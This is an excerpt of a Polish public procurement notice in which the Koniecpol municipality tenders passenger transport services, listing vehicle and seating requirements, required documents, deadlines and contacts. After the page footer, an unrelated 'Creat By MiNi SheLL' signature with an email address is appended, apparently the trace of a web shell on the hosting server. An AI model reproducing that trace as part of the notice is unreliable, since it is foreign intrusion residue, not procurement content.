osób;<br/>2)	zdolności technicznej lub zawodowej – Zamawiający określa następujące warunki szczegółowe:<br/>ZADANIE (część) nr 1 – Zamawiający wymaga, aby wykonawca wykazał, że posiada co najmniej 4 pojazdy przystosowane do przewozu osób, o łącznej liczbie miejsc siedzących minimum 177, w tym:<br/>- co najmniej 1 pojazdy o liczbie miejsc siedzących minimum: 54;<br/>- co najmniej 1 pojazd o liczbie miejsc siedzących minimum: 51;<br/>- co najmniej 1 pojazd o liczbie miejsc siedzących minimum: 43;<br/>- co naj mniej 1 pojazd o liczbie miejsc siedzących minimum: 29. <br/><br/>ZADANIE (część) nr 2 - Zamawiający wymaga, aby wykonawca wykazał, że posiada co najmniej 1 pojazd przystosowany do przewozu osób, o łącznej liczbie miejsc siedzących dla pasażerów minimum: 8.<br/><br/>UWAGA:<br/>W przypadku składania oferty na dwa zadania, Wykonawcy muszą wykazać oddzielne pojazdy dla każdego z Zadań (części). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, zamawiający żąda następujących podmiotowych środków dowodowych (dotyczy wszystkich części):<br/>1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi Załącznik nr 7 do SWZ; <br/>2)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej zamawiający żąda następujących podmiotowych środków dowodowych:<br/>ZADANIE (część) nr 1:<br/>1)	Zezwolenie na wykonywanie zawodu przewoźnika drogowego w zakresie przewozu osób, wydane na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2021 r. poz. 919 z późn. zm.).<br/>2)	wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie dysponowania tymi zasobami (sporządzony wg wzoru stanowiącego załącznik nr 10 do SIWZ);<br/><br/>ZADANIE (część) nr 2:<br/>1)	aktualnej licencji na wykonywanie krajowego transportu drogowego w zakresie przewozu osób wydaną zgodnie z ustawą z dnia 6 września 2001r. o transporcie drogowym (t.j. Dz. U. z 2021 r. poz. 919 z późn. zm.) lub zezwolenie na wykonywanie zawodu przewoźnika drogowego w zakresie przewozu osób;<br/>2)	wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie dysponowania tymi zasobami (sporządzony wg wzoru stanowiącego załącznik nr 10 do SWZ);</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z którego treści będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia Wykonawców występujących wspólnie należy załączyć do oferty. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy. <br/>2) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. <br/>3) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, o którym mowa w art. 125 ust. 1 Pzp składa każdy z wykonawców występujących wspólnie. Oświadczenia te dołączone do oferty potwierdzają brak podstaw do wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>4) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane (art. 117 ust. 3 Pzp). W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi Załącznik nr 6 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia określone zostały w załącznikach nr 2a i 2b do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w postępowaniu za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP (https://epuap.gov.pl/wps/portal) i udostępnionego również na miniPortalu. Proces szyfrowania oferty następuje na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-20 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający uzupełnia zapis Sekcji III pkt 3.5.), o następujące informacje: <br/>"1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu miniPortalu dostępnego pod adresem: https://miniportal.uzp.gov.pl/, ePUAP-u (Elektroniczna Skrzynka Podawcza, adres skrzynki Zamawiającego: /UMiGKoniecpol/EOD), dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej e-mail:umig@koniecpol.pl<br/>2. Osobami uprawnionymi do porozumiewania się z wykonawcami są:<br/>1)	Sebastian Musiał – e-mail: umig@koniecpol.pl <br/>2)	Marzena Ożarowska – e-mail: umig@koniecpol.pl</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-12 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com